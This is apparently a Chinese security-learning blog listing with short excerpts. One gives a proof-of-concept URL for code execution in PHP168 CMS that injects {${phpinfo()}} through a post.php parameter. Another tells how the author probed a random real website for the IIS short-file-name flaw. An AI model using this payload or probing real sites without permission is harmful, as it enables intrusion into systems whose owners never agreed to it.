摘要：今天了解了php 168的任意代码执行漏洞，Poc: http://192.168.6.128/pentest/cms/php168/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML 阅读全文

摘要：今天看教程的时候，老师关于后台管理说到了短文件名漏洞，我就随便找了个网站猜解，可能是运气太好了，有了这次实践的过程，因为这个漏洞是13年的时候比较火，现在差不多都修复了，抓到一条漏网之鱼， 短文件名漏洞形成原理网上有很多，这里就不赘述了， 手工猜解也是不可能滴，耗时又耗力，伟大的GITHUB上已经有 阅读全文

该文被密码保护。